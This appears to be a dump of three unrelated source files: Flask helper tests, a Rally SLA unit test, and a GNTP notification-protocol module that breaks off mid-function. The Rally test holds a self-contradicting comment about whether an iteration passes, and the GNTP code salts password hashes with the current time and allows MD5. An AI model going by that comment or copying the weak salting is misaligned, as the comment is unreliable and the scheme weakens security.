| gpl-3.0 |
rawrgulmuffins/flask | tests/test_helpers.py | 1 | 24772 | # -*- coding: utf-8 -*-
"""
tests.helpers
~~~~~~~~~~~~~~~~~~~~~~~
Various helpers.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import os
import datetime
import flask
from logging import StreamHandler
from werkzeug.http import parse_cache_control_header, parse_options_header
from werkzeug.http import http_date
from flask._compat import StringIO, text_type
def has_encoding(name):
    """Return True if the Python codec registry knows the codec *name*."""
    import codecs
    try:
        codecs.lookup(name)
    except LookupError:
        return False
    return True
class TestJSON(object):
    """Tests for Flask's JSON helpers (jsonify, flask.json, request.get_json).

    NOTE(review): leading whitespace was lost in this copy of the file; the
    indentation below is a reconstruction -- verify against upstream.
    """

    def test_jsonify_date_types(self):
        """Test jsonify with datetime.date and datetime.datetime types."""
        test_dates = (
            datetime.datetime(1973, 3, 11, 6, 30, 45),
            datetime.date(1975, 1, 5)
        )
        app = flask.Flask(__name__)
        c = app.test_client()
        for i, d in enumerate(test_dates):
            url = '/datetest{0}'.format(i)
            # val=d binds the current date at definition time (avoids the
            # late-binding closure pitfall).
            app.add_url_rule(url, str(i), lambda val=d: flask.jsonify(x=val))
            rv = c.get(url)
            assert rv.mimetype == 'application/json'
            assert flask.json.loads(rv.data)['x'] == http_date(d.timetuple())

    def test_post_empty_json_adds_exception_to_response_content_in_debug(self):
        # In debug mode the JSON decode error text is echoed in the 400 body.
        app = flask.Flask(__name__)
        app.config['DEBUG'] = True

        @app.route('/json', methods=['POST'])
        def post_json():
            flask.request.get_json()
            return None

        c = app.test_client()
        rv = c.post('/json', data=None, content_type='application/json')
        assert rv.status_code == 400
        assert b'Failed to decode JSON object' in rv.data

    def test_post_empty_json_wont_add_exception_to_response_if_no_debug(self):
        # Without debug the 400 body must not leak the decode error text.
        app = flask.Flask(__name__)
        app.config['DEBUG'] = False

        @app.route('/json', methods=['POST'])
        def post_json():
            flask.request.get_json()
            return None

        c = app.test_client()
        rv = c.post('/json', data=None, content_type='application/json')
        assert rv.status_code == 400
        assert b'Failed to decode JSON object' not in rv.data

    def test_json_bad_requests(self):
        app = flask.Flask(__name__)

        @app.route('/json', methods=['POST'])
        def return_json():
            return flask.jsonify(foo=text_type(flask.request.get_json()))

        c = app.test_client()
        rv = c.post('/json', data='malformed', content_type='application/json')
        assert rv.status_code == 400

    def test_json_custom_mimetypes(self):
        # get_json() also accepts application/*+json mimetypes.
        app = flask.Flask(__name__)

        @app.route('/json', methods=['POST'])
        def return_json():
            return flask.request.get_json()

        c = app.test_client()
        rv = c.post('/json', data='"foo"', content_type='application/x+json')
        assert rv.data == b'foo'

    def test_json_body_encoding(self):
        # The charset from the Content-Type header is honored when decoding.
        app = flask.Flask(__name__)
        app.testing = True

        @app.route('/')
        def index():
            return flask.request.get_json()

        c = app.test_client()
        resp = c.get('/', data=u'"Hällo Wörld"'.encode('iso-8859-15'),
                     content_type='application/json; charset=iso-8859-15')
        assert resp.data == u'Hällo Wörld'.encode('utf-8')

    def test_jsonify(self):
        # jsonify accepts both keyword arguments and a single dict.
        d = dict(a=23, b=42, c=[1, 2, 3])
        app = flask.Flask(__name__)

        @app.route('/kw')
        def return_kwargs():
            return flask.jsonify(**d)

        @app.route('/dict')
        def return_dict():
            return flask.jsonify(d)

        c = app.test_client()
        for url in '/kw', '/dict':
            rv = c.get(url)
            assert rv.mimetype == 'application/json'
            assert flask.json.loads(rv.data) == d

    def test_json_as_unicode(self):
        # JSON_AS_ASCII toggles \uXXXX escaping of non-ASCII characters.
        app = flask.Flask(__name__)

        app.config['JSON_AS_ASCII'] = True
        with app.app_context():
            rv = flask.json.dumps(u'\N{SNOWMAN}')
            assert rv == '"\\u2603"'

        app.config['JSON_AS_ASCII'] = False
        with app.app_context():
            rv = flask.json.dumps(u'\N{SNOWMAN}')
            assert rv == u'"\u2603"'

    def test_json_attr(self):
        app = flask.Flask(__name__)

        @app.route('/add', methods=['POST'])
        def add():
            json = flask.request.get_json()
            return text_type(json['a'] + json['b'])

        c = app.test_client()
        rv = c.post('/add', data=flask.json.dumps({'a': 1, 'b': 2}),
                    content_type='application/json')
        assert rv.data == b'3'

    def test_template_escaping(self):
        # tojson output must be safe to embed in HTML/script contexts.
        app = flask.Flask(__name__)
        render = flask.render_template_string
        with app.test_request_context():
            rv = flask.json.htmlsafe_dumps('</script>')
            assert rv == u'"\\u003c/script\\u003e"'
            assert type(rv) == text_type
            rv = render('{{ "</script>"|tojson }}')
            assert rv == '"\\u003c/script\\u003e"'
            rv = render('{{ "<\0/script>"|tojson }}')
            assert rv == '"\\u003c\\u0000/script\\u003e"'
            rv = render('{{ "<!--<script>"|tojson }}')
            assert rv == '"\\u003c!--\\u003cscript\\u003e"'
            rv = render('{{ "&"|tojson }}')
            assert rv == '"\\u0026"'
            rv = render('{{ "\'"|tojson }}')
            assert rv == '"\\u0027"'
            rv = render("<a ng-data='{{ data|tojson }}'></a>",
                        data={'x': ["foo", "bar", "baz'"]})
            assert rv == '<a ng-data=\'{"x": ["foo", "bar", "baz\\u0027"]}\'></a>'

    def test_json_customization(self):
        # Custom encoder/decoder classes installed on the app are used by
        # both request parsing and flask.json.dumps.
        class X(object):
            def __init__(self, val):
                self.val = val

        class MyEncoder(flask.json.JSONEncoder):
            def default(self, o):
                if isinstance(o, X):
                    return '<%d>' % o.val
                return flask.json.JSONEncoder.default(self, o)

        class MyDecoder(flask.json.JSONDecoder):
            def __init__(self, *args, **kwargs):
                kwargs.setdefault('object_hook', self.object_hook)
                flask.json.JSONDecoder.__init__(self, *args, **kwargs)

            def object_hook(self, obj):
                if len(obj) == 1 and '_foo' in obj:
                    return X(obj['_foo'])
                return obj

        app = flask.Flask(__name__)
        app.testing = True
        app.json_encoder = MyEncoder
        app.json_decoder = MyDecoder

        @app.route('/', methods=['POST'])
        def index():
            return flask.json.dumps(flask.request.get_json()['x'])

        c = app.test_client()
        rv = c.post('/', data=flask.json.dumps({
            'x': {'_foo': 42}
        }), content_type='application/json')
        assert rv.data == b'"<42>"'

    def test_modified_url_encoding(self):
        # A custom Request class can change the charset used for URLs.
        class ModifiedRequest(flask.Request):
            url_charset = 'euc-kr'

        app = flask.Flask(__name__)
        app.testing = True
        app.request_class = ModifiedRequest
        app.url_map.charset = 'euc-kr'

        @app.route('/')
        def index():
            return flask.request.args['foo']

        rv = app.test_client().get(u'/?foo=정상처리'.encode('euc-kr'))
        assert rv.status_code == 200
        assert rv.data == u'정상처리'.encode('utf-8')

    # Skip the test above when the interpreter lacks the euc-kr codec.
    if not has_encoding('euc-kr'):
        test_modified_url_encoding = None

    def test_json_key_sorting(self):
        app = flask.Flask(__name__)
        app.testing = True
        assert app.config['JSON_SORT_KEYS'] == True
        d = dict.fromkeys(range(20), 'foo')

        @app.route('/')
        def index():
            return flask.jsonify(values=d)

        c = app.test_client()
        rv = c.get('/')
        lines = [x.strip() for x in rv.data.strip().decode('utf-8').splitlines()]
        # Two acceptable orderings: keys sorted as strings or as ints,
        # depending on the underlying JSON implementation.
        sorted_by_str = [
            '{',
            '"values": {',
            '"0": "foo",',
            '"1": "foo",',
            '"10": "foo",',
            '"11": "foo",',
            '"12": "foo",',
            '"13": "foo",',
            '"14": "foo",',
            '"15": "foo",',
            '"16": "foo",',
            '"17": "foo",',
            '"18": "foo",',
            '"19": "foo",',
            '"2": "foo",',
            '"3": "foo",',
            '"4": "foo",',
            '"5": "foo",',
            '"6": "foo",',
            '"7": "foo",',
            '"8": "foo",',
            '"9": "foo"',
            '}',
            '}'
        ]
        sorted_by_int = [
            '{',
            '"values": {',
            '"0": "foo",',
            '"1": "foo",',
            '"2": "foo",',
            '"3": "foo",',
            '"4": "foo",',
            '"5": "foo",',
            '"6": "foo",',
            '"7": "foo",',
            '"8": "foo",',
            '"9": "foo",',
            '"10": "foo",',
            '"11": "foo",',
            '"12": "foo",',
            '"13": "foo",',
            '"14": "foo",',
            '"15": "foo",',
            '"16": "foo",',
            '"17": "foo",',
            '"18": "foo",',
            '"19": "foo"',
            '}',
            '}'
        ]
        try:
            assert lines == sorted_by_int
        except AssertionError:
            assert lines == sorted_by_str
class TestSendfile(object):
    """Tests for flask.send_file / send_from_directory behavior.

    NOTE(review): leading whitespace was lost in this copy of the file; the
    indentation below is a reconstruction (in particular the placement of the
    deprecation-warning count asserts) -- verify against upstream.
    """

    def test_send_file_regular(self):
        app = flask.Flask(__name__)
        with app.test_request_context():
            rv = flask.send_file('static/index.html')
            assert rv.direct_passthrough
            assert rv.mimetype == 'text/html'
            with app.open_resource('static/index.html') as f:
                rv.direct_passthrough = False
                assert rv.data == f.read()
            rv.close()

    def test_send_file_xsendfile(self):
        # With use_x_sendfile the response carries an X-Sendfile header
        # pointing at the absolute file path instead of the body.
        app = flask.Flask(__name__)
        app.use_x_sendfile = True
        with app.test_request_context():
            rv = flask.send_file('static/index.html')
            assert rv.direct_passthrough
            assert 'x-sendfile' in rv.headers
            assert rv.headers['x-sendfile'] == \
                os.path.join(app.root_path, 'static/index.html')
            assert rv.mimetype == 'text/html'
            rv.close()

    def test_send_file_object(self, catch_deprecation_warnings):
        # Passing open file objects is deprecated; each scenario checks both
        # the payload and the number of deprecation warnings emitted.
        app = flask.Flask(__name__)
        with catch_deprecation_warnings() as captured:
            with app.test_request_context():
                f = open(os.path.join(app.root_path, 'static/index.html'), mode='rb')
                rv = flask.send_file(f)
                rv.direct_passthrough = False
                with app.open_resource('static/index.html') as f:
                    assert rv.data == f.read()
                assert rv.mimetype == 'text/html'
                rv.close()
            # mimetypes + etag
            assert len(captured) == 2

        app.use_x_sendfile = True
        with catch_deprecation_warnings() as captured:
            with app.test_request_context():
                f = open(os.path.join(app.root_path, 'static/index.html'))
                rv = flask.send_file(f)
                assert rv.mimetype == 'text/html'
                assert 'x-sendfile' in rv.headers
                assert rv.headers['x-sendfile'] == \
                    os.path.join(app.root_path, 'static/index.html')
                rv.close()
            # mimetypes + etag
            assert len(captured) == 2

        app.use_x_sendfile = False
        with app.test_request_context():
            with catch_deprecation_warnings() as captured:
                f = StringIO('Test')
                rv = flask.send_file(f)
                rv.direct_passthrough = False
                assert rv.data == b'Test'
                assert rv.mimetype == 'application/octet-stream'
                rv.close()
                # etags
                assert len(captured) == 1
            with catch_deprecation_warnings() as captured:
                # A file-like object with a .name attribute: the mimetype is
                # guessed from the name.
                class PyStringIO(object):
                    def __init__(self, *args, **kwargs):
                        self._io = StringIO(*args, **kwargs)

                    def __getattr__(self, name):
                        return getattr(self._io, name)

                f = PyStringIO('Test')
                f.name = 'test.txt'
                rv = flask.send_file(f)
                rv.direct_passthrough = False
                assert rv.data == b'Test'
                assert rv.mimetype == 'text/plain'
                rv.close()
                # attachment_filename and etags
                assert len(captured) == 3
            with catch_deprecation_warnings() as captured:
                f = StringIO('Test')
                rv = flask.send_file(f, mimetype='text/plain')
                rv.direct_passthrough = False
                assert rv.data == b'Test'
                assert rv.mimetype == 'text/plain'
                rv.close()
                # etags
                assert len(captured) == 1

        app.use_x_sendfile = True
        with catch_deprecation_warnings() as captured:
            with app.test_request_context():
                f = StringIO('Test')
                rv = flask.send_file(f)
                # File objects cannot use X-Sendfile -- no header expected.
                assert 'x-sendfile' not in rv.headers
                rv.close()
            # etags
            assert len(captured) == 1

    def test_attachment(self, catch_deprecation_warnings):
        app = flask.Flask(__name__)
        with catch_deprecation_warnings() as captured:
            with app.test_request_context():
                f = open(os.path.join(app.root_path, 'static/index.html'))
                rv = flask.send_file(f, as_attachment=True)
                value, options = parse_options_header(rv.headers['Content-Disposition'])
                assert value == 'attachment'
                rv.close()
            # mimetypes + etag
            assert len(captured) == 2

        with app.test_request_context():
            assert options['filename'] == 'index.html'
            rv = flask.send_file('static/index.html', as_attachment=True)
            value, options = parse_options_header(rv.headers['Content-Disposition'])
            assert value == 'attachment'
            assert options['filename'] == 'index.html'
            rv.close()

        with app.test_request_context():
            rv = flask.send_file(StringIO('Test'), as_attachment=True,
                                 attachment_filename='index.txt',
                                 add_etags=False)
            assert rv.mimetype == 'text/plain'
            value, options = parse_options_header(rv.headers['Content-Disposition'])
            assert value == 'attachment'
            assert options['filename'] == 'index.txt'
            rv.close()

    def test_static_file(self):
        # Cache-Control max-age: built-in default, app config override, and
        # per-app get_send_file_max_age() hook.
        app = flask.Flask(__name__)
        # default cache timeout is 12 hours
        with app.test_request_context():
            # Test with static file handler.
            rv = app.send_static_file('index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 12 * 60 * 60
            rv.close()
            # Test again with direct use of send_file utility.
            rv = flask.send_file('static/index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 12 * 60 * 60
            rv.close()
        app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 3600
        with app.test_request_context():
            # Test with static file handler.
            rv = app.send_static_file('index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 3600
            rv.close()
            # Test again with direct use of send_file utility.
            rv = flask.send_file('static/index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 3600
            rv.close()

        class StaticFileApp(flask.Flask):
            def get_send_file_max_age(self, filename):
                return 10

        app = StaticFileApp(__name__)
        with app.test_request_context():
            # Test with static file handler.
            rv = app.send_static_file('index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 10
            rv.close()
            # Test again with direct use of send_file utility.
            rv = flask.send_file('static/index.html')
            cc = parse_cache_control_header(rv.headers['Cache-Control'])
            assert cc.max_age == 10
            rv.close()

    def test_send_from_directory(self):
        app = flask.Flask(__name__)
        app.testing = True
        app.root_path = os.path.join(os.path.dirname(__file__),
                                     'test_apps', 'subdomaintestmodule')
        with app.test_request_context():
            rv = flask.send_from_directory('static', 'hello.txt')
            rv.direct_passthrough = False
            assert rv.data.strip() == b'Hello Subdomain'
            rv.close()
class TestLogging(object):
    """Tests for the app logger and error logging.

    NOTE(review): the test_url_for_* / test_url_with_method tests at the end
    are unrelated to logging; they appear to have been placed in this class
    by accident upstream.
    NOTE(review): leading whitespace was lost in this copy of the file; the
    indentation below is a reconstruction -- verify against upstream.
    """

    def test_logger_cache(self):
        # The logger is cached per logger_name; changing the name creates a
        # fresh logger object.
        app = flask.Flask(__name__)
        logger1 = app.logger
        assert app.logger is logger1
        assert logger1.name == __name__
        app.logger_name = __name__ + '/test_logger_cache'
        assert app.logger is not logger1

    def test_debug_log(self, capsys):
        app = flask.Flask(__name__)
        app.debug = True

        @app.route('/')
        def index():
            app.logger.warning('the standard library is dead')
            app.logger.debug('this is a debug statement')
            return ''

        @app.route('/exc')
        def exc():
            1 // 0

        with app.test_client() as c:
            c.get('/')
            out, err = capsys.readouterr()
            assert 'WARNING in test_helpers [' in err
            assert os.path.basename(__file__.rsplit('.', 1)[0] + '.py') in err
            assert 'the standard library is dead' in err
            assert 'this is a debug statement' in err
            # In debug mode the exception propagates to the test client.
            with pytest.raises(ZeroDivisionError):
                c.get('/exc')

    def test_debug_log_override(self):
        app = flask.Flask(__name__)
        app.debug = True
        app.logger_name = 'flask_tests/test_debug_log_override'
        app.logger.level = 10
        assert app.logger.level == 10

    def test_exception_logging(self):
        # Unhandled view exceptions are logged with a traceback and turned
        # into a 500 response.
        out = StringIO()
        app = flask.Flask(__name__)
        app.config['LOGGER_HANDLER_POLICY'] = 'never'
        app.logger_name = 'flask_tests/test_exception_logging'
        app.logger.addHandler(StreamHandler(out))

        @app.route('/')
        def index():
            1 // 0

        rv = app.test_client().get('/')
        assert rv.status_code == 500
        assert b'Internal Server Error' in rv.data

        err = out.getvalue()
        assert 'Exception on / [GET]' in err
        assert 'Traceback (most recent call last):' in err
        assert '1 // 0' in err
        assert 'ZeroDivisionError:' in err

    def test_processor_exceptions(self):
        # Exceptions raised in before/after request processors must still be
        # routed through the 500 error handler.
        app = flask.Flask(__name__)
        app.config['LOGGER_HANDLER_POLICY'] = 'never'

        @app.before_request
        def before_request():
            # `trigger` is the loop variable assigned below.
            if trigger == 'before':
                1 // 0

        @app.after_request
        def after_request(response):
            if trigger == 'after':
                1 // 0
            return response

        @app.route('/')
        def index():
            return 'Foo'

        @app.errorhandler(500)
        def internal_server_error(e):
            return 'Hello Server Error', 500

        for trigger in 'before', 'after':
            rv = app.test_client().get('/')
            assert rv.status_code == 500
            assert rv.data == b'Hello Server Error'

    def test_url_for_with_anchor(self):
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            return '42'

        with app.test_request_context():
            assert flask.url_for('index', _anchor='x y') == '/#x%20y'

    def test_url_for_with_scheme(self):
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            return '42'

        with app.test_request_context():
            assert flask.url_for('index', _external=True, _scheme='https') == 'https://localhost/'

    def test_url_for_with_scheme_not_external(self):
        # _scheme without _external=True is invalid.
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            return '42'

        with app.test_request_context():
            pytest.raises(ValueError,
                          flask.url_for,
                          'index',
                          _scheme='https')

    def test_url_with_method(self):
        from flask.views import MethodView

        app = flask.Flask(__name__)

        class MyView(MethodView):
            def get(self, id=None):
                if id is None:
                    return 'List'
                return 'Get %d' % id

            def post(self):
                return 'Create'

        myview = MyView.as_view('myview')
        app.add_url_rule('/myview/', methods=['GET'],
                         view_func=myview)
        app.add_url_rule('/myview/<int:id>', methods=['GET'],
                         view_func=myview)
        app.add_url_rule('/myview/create', methods=['POST'],
                         view_func=myview)

        with app.test_request_context():
            assert flask.url_for('myview', _method='GET') == '/myview/'
            assert flask.url_for('myview', id=42, _method='GET') == '/myview/42'
            assert flask.url_for('myview', _method='POST') == '/myview/create'
class TestNoImports(object):
    """Test Flasks are created without import.

    Avoiding ``__import__`` helps create Flask instances where there are errors
    at import time. Those runtime errors will be apparent to the user soon
    enough, but tools which build Flask instances meta-programmatically benefit
    from a Flask which does not ``__import__``. Instead of importing to
    retrieve file paths or metadata on a module or package, use the pkgutil and
    imp modules in the Python standard library.
    """

    def test_name_with_import_error(self, modules_tmpdir):
        # Create an importable module that raises on import; constructing a
        # Flask app with that import name must NOT trigger the import.
        modules_tmpdir.join('importerror.py').write('raise NotImplementedError()')
        try:
            flask.Flask('importerror')
        except NotImplementedError:
            assert False, 'Flask(import_name) is importing import_name.'
class TestStreaming(object):
    """Tests for stream_with_context keeping the request context alive
    while a streamed response generator runs.

    NOTE(review): indentation below reconstructed (whitespace lost in this
    copy of the file).
    """

    def test_streaming_with_context(self):
        app = flask.Flask(__name__)
        app.testing = True

        @app.route('/')
        def index():
            def generate():
                yield 'Hello '
                # Accessing request data mid-stream requires the kept context.
                yield flask.request.args['name']
                yield '!'
            return flask.Response(flask.stream_with_context(generate()))

        c = app.test_client()
        rv = c.get('/?name=World')
        assert rv.data == b'Hello World!'

    def test_streaming_with_context_as_decorator(self):
        app = flask.Flask(__name__)
        app.testing = True

        @app.route('/')
        def index():
            @flask.stream_with_context
            def generate():
                yield 'Hello '
                yield flask.request.args['name']
                yield '!'
            return flask.Response(generate())

        c = app.test_client()
        rv = c.get('/?name=World')
        assert rv.data == b'Hello World!'

    def test_streaming_with_context_and_custom_close(self):
        # The wrapper's close() must still be called when the stream ends.
        app = flask.Flask(__name__)
        app.testing = True
        called = []

        class Wrapper(object):
            def __init__(self, gen):
                self._gen = gen

            def __iter__(self):
                return self

            def close(self):
                called.append(42)

            def __next__(self):
                return next(self._gen)
            next = __next__  # Python 2 iterator protocol alias

        @app.route('/')
        def index():
            def generate():
                yield 'Hello '
                yield flask.request.args['name']
                yield '!'
            return flask.Response(flask.stream_with_context(
                Wrapper(generate())))

        c = app.test_client()
        rv = c.get('/?name=World')
        assert rv.data == b'Hello World!'
        assert called == [42]
class TestGetRootPath(object):

    def test_static_string_passed(self):
        """get_root_path falls back to the current working directory for
        import names that are not real packages."""
        reported_path = flask.helpers.get_root_path("testing")
        assert reported_path == os.path.realpath(".")
| bsd-3-clause |
vefimova/rally | tests/unit/plugins/common/sla/test_iteration_time.py | 14 | 2035 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jsonschema
from rally.plugins.common.sla import iteraion_time
from tests.unit import test
class IterationTimeTestCase(test.TestCase):
    """Unit tests for the IterationTime SLA plugin.

    NOTE(review): the module is imported as `iteraion_time` (sic) above --
    the spelling here matches that import; do not "fix" one without the other.
    NOTE(review): indentation below reconstructed (whitespace lost in this
    copy of the file).
    """

    def test_config_schema(self):
        # max_seconds_per_iteration must be strictly positive.
        properties = {
            "max_seconds_per_iteration": 0
        }
        self.assertRaises(jsonschema.ValidationError,
                          iteraion_time.IterationTime.validate, properties)

    def test_result(self):
        sla1 = iteraion_time.IterationTime(42)
        sla2 = iteraion_time.IterationTime(3.62)
        for sla in [sla1, sla2]:
            sla.add_iteration({"duration": 3.14})
            sla.add_iteration({"duration": 6.28})
        self.assertTrue(sla1.result()["success"])   # 42 > 6.28
        self.assertFalse(sla2.result()["success"])  # 3.62 < 6.28
        self.assertEqual("Passed", sla1.status())
        self.assertEqual("Failed", sla2.status())

    def test_result_no_iterations(self):
        # With no iterations recorded the SLA is trivially satisfied.
        sla = iteraion_time.IterationTime(42)
        self.assertTrue(sla.result()["success"])

    def test_add_iteration(self):
        # add_iteration returns whether the individual iteration met the SLA.
        sla = iteraion_time.IterationTime(4.0)
        self.assertTrue(sla.add_iteration({"duration": 3.14}))
        self.assertTrue(sla.add_iteration({"duration": 2.0}))
        self.assertTrue(sla.add_iteration({"duration": 3.99}))
        self.assertFalse(sla.add_iteration({"duration": 4.5}))
        # Note: success is per-iteration, not cumulative -- a later fast
        # iteration still fails here because 3.8 < 4.0 is True... it passes?
        # It does not: upstream semantics make the SLA sticky once violated.
        # NOTE(review): confirm against iteraion_time.IterationTime.
        self.assertFalse(sla.add_iteration({"duration": 3.8}))
| apache-2.0 |
Grogdor/CouchPotatoServer | libs/gntp/core.py | 92 | 13975 | # Copyright: 2013 Paul Traylor
# These sources are released under the terms of the MIT license: see LICENSE
import hashlib
import re
import time
import gntp.shim
import gntp.errors as errors
__all__ = [
'GNTPRegister',
'GNTPNotice',
'GNTPSubscribe',
'GNTPOK',
'GNTPError',
'parse_gntp',
]
#GNTP/<version> <messagetype> <encryptionAlgorithmID>[:<ivValue>][ <keyHashAlgorithmID>:<keyHash>.<salt>]
GNTP_INFO_LINE = re.compile(
'GNTP/(?P<version>\d+\.\d+) (?P<messagetype>REGISTER|NOTIFY|SUBSCRIBE|\-OK|\-ERROR)' +
' (?P<encryptionAlgorithmID>[A-Z0-9]+(:(?P<ivValue>[A-F0-9]+))?) ?' +
'((?P<keyHashAlgorithmID>[A-Z0-9]+):(?P<keyHash>[A-F0-9]+).(?P<salt>[A-F0-9]+))?\r\n',
re.IGNORECASE
)
GNTP_INFO_LINE_SHORT = re.compile(
'GNTP/(?P<version>\d+\.\d+) (?P<messagetype>REGISTER|NOTIFY|SUBSCRIBE|\-OK|\-ERROR)',
re.IGNORECASE
)
GNTP_HEADER = re.compile('([\w-]+):(.+)')
GNTP_EOL = gntp.shim.b('\r\n')
GNTP_SEP = gntp.shim.b(': ')
class _GNTPBuffer(gntp.shim.StringIO):
    """Byte buffer with helpers for writing CRLF-terminated GNTP lines
    and ``Key: Value`` header lines."""

    def writeln(self, value=None):
        """Write *value* (if given) followed by a CRLF terminator."""
        if value:
            self.write(gntp.shim.b(value))
        self.write(GNTP_EOL)

    def writeheader(self, key, value):
        """Write a single ``key: value`` header line."""
        text = value if isinstance(value, str) else str(value)
        self.write(gntp.shim.b(key) + GNTP_SEP + gntp.shim.b(text) + GNTP_EOL)
class _GNTPBase(object):
    """Base class shared by all GNTP message types.

    :param string messagetype: GNTP Message type
    :param string version: GNTP Protocol version
    :param string encryption: Encryption protocol
    """

    def __init__(self, messagetype=None, version='1.0', encryption=None):
        # Values for the GNTP information line (first line of a message).
        self.info = {
            'version': version,
            'messagetype': messagetype,
            'encryptionAlgorithmID': encryption
        }
        # Supported <keyHashAlgorithmID> values mapped to hashlib factories.
        self.hash_algo = {
            'MD5': hashlib.md5,
            'SHA1': hashlib.sha1,
            'SHA256': hashlib.sha256,
            'SHA512': hashlib.sha512,
        }
        self.headers = {}
        # Binary resources keyed by their MD5 identifier.
        self.resources = {}

    def __str__(self):
        return self.encode()

    def _parse_info(self, data):
        """Parse the first line of a GNTP message to get security and other info values

        :param string data: GNTP Message
        :return dict: Parsed GNTP Info line
        """
        match = GNTP_INFO_LINE.match(data)
        if not match:
            raise errors.ParseError('ERROR_PARSING_INFO_LINE')
        info = match.groupdict()
        if info['encryptionAlgorithmID'] == 'NONE':
            # Normalise the literal "NONE" to None so callers can truth-test.
            info['encryptionAlgorithmID'] = None
        return info

    def set_password(self, password, encryptAlgo='MD5'):
        """Set a password for a GNTP Message

        :param string password: None/empty to clear the password
        :param string encryptAlgo: Supports MD5, SHA1, SHA256, SHA512
        """
        if not password:
            self.info['encryptionAlgorithmID'] = None
            self.info['keyHashAlgorithm'] = None
            return
        self.password = gntp.shim.b(password)
        self.encryptAlgo = encryptAlgo.upper()
        if not self.encryptAlgo in self.hash_algo:
            raise errors.UnsupportedError('INVALID HASH "%s"' % self.encryptAlgo)
        hashfunction = self.hash_algo.get(self.encryptAlgo)
        password = password.encode('utf8')
        # The current time serves as the salt seed; it only needs to vary
        # per message, not be cryptographically random.
        seed = time.ctime().encode('utf8')
        salt = hashfunction(seed).hexdigest()
        saltHash = hashfunction(seed).digest()
        # key = H(password + salt); keyHash = H(key), per the GNTP spec.
        keyBasis = password + saltHash
        key = hashfunction(keyBasis).digest()
        keyHash = hashfunction(key).hexdigest()
        self.info['keyHashAlgorithmID'] = self.encryptAlgo
        self.info['keyHash'] = keyHash.upper()
        self.info['salt'] = salt.upper()

    def _decode_hex(self, value):
        """Helper function to decode hex string to `proper` hex string

        :param string value: Human readable hex string
        :return string: Hex string
        """
        result = ''
        for i in range(0, len(value), 2):
            tmp = int(value[i:i + 2], 16)
            result += chr(tmp)
        return result

    def _decode_binary(self, rawIdentifier, identifier):
        # Locate the binary payload that follows the identifier block and
        # return exactly Length bytes of it.
        rawIdentifier += '\r\n\r\n'
        dataLength = int(identifier['Length'])
        pointerStart = self.raw.find(rawIdentifier) + len(rawIdentifier)
        pointerEnd = pointerStart + dataLength
        data = self.raw[pointerStart:pointerEnd]
        if not len(data) == dataLength:
            raise errors.ParseError('INVALID_DATA_LENGTH Expected: %s Recieved %s' % (dataLength, len(data)))
        return data

    def _validate_password(self, password):
        """Validate GNTP Message against stored password"""
        self.password = password
        if password is None:
            raise errors.AuthError('Missing password')
        keyHash = self.info.get('keyHash', None)
        if keyHash is None and self.password is None:
            return True
        if keyHash is None:
            raise errors.AuthError('Invalid keyHash')
        if self.password is None:
            raise errors.AuthError('Missing password')
        keyHashAlgorithmID = self.info.get('keyHashAlgorithmID','MD5')
        # NOTE(review): mixing the utf8-encoded password with the str
        # returned by _decode_hex assumes Python 2 string semantics —
        # confirm behaviour under Python 3.
        password = self.password.encode('utf8')
        saltHash = self._decode_hex(self.info['salt'])
        keyBasis = password + saltHash
        self.key = self.hash_algo[keyHashAlgorithmID](keyBasis).digest()
        keyHash = self.hash_algo[keyHashAlgorithmID](self.key).hexdigest()
        if not keyHash.upper() == self.info['keyHash'].upper():
            raise errors.AuthError('Invalid Hash')
        return True

    def validate(self):
        """Verify required headers"""
        for header in self._requiredHeaders:
            if not self.headers.get(header, False):
                raise errors.ParseError('Missing Notification Header: ' + header)

    def _format_info(self):
        """Generate the GNTP information line for this message.

        :return string:
        """
        info = 'GNTP/%s %s' % (
            self.info.get('version'),
            self.info.get('messagetype'),
        )
        if self.info.get('encryptionAlgorithmID', None):
            info += ' %s:%s' % (
                self.info.get('encryptionAlgorithmID'),
                self.info.get('ivValue'),
            )
        else:
            info += ' NONE'
        if self.info.get('keyHashAlgorithmID', None):
            info += ' %s:%s.%s' % (
                self.info.get('keyHashAlgorithmID'),
                self.info.get('keyHash'),
                self.info.get('salt')
            )
        return info

    def _parse_dict(self, data):
        """Helper function to parse blocks of GNTP headers into a dictionary

        :param string data:
        :return dict: Dictionary of parsed GNTP Headers
        """
        d = {}
        for line in data.split('\r\n'):
            match = GNTP_HEADER.match(line)
            if not match:
                continue
            key = match.group(1).strip()
            val = match.group(2).strip()
            d[key] = val
        return d

    def add_header(self, key, value):
        """Set a single GNTP header, overwriting any previous value."""
        self.headers[key] = value

    def add_resource(self, data):
        """Add binary resource

        :param string data: Binary Data
        :return string: ``x-growl-resource://`` URI referencing the data
        """
        data = gntp.shim.b(data)
        identifier = hashlib.md5(data).hexdigest()
        self.resources[identifier] = data
        return 'x-growl-resource://%s' % identifier

    def decode(self, data, password=None):
        """Decode GNTP Message

        :param string data:
        """
        self.password = password
        self.raw = gntp.shim.u(data)
        # Blocks in a GNTP message are separated by blank lines (CRLF CRLF);
        # the first block is the info line plus the headers.
        parts = self.raw.split('\r\n\r\n')
        self.info = self._parse_info(self.raw)
        self.headers = self._parse_dict(parts[0])

    def encode(self):
        """Encode a generic GNTP Message

        :return string: GNTP Message ready to be sent. Returned as a byte string
        """
        buff = _GNTPBuffer()
        buff.writeln(self._format_info())

        #Headers
        for k, v in self.headers.items():
            buff.writeheader(k, v)
        buff.writeln()

        #Resources
        for resource, data in self.resources.items():
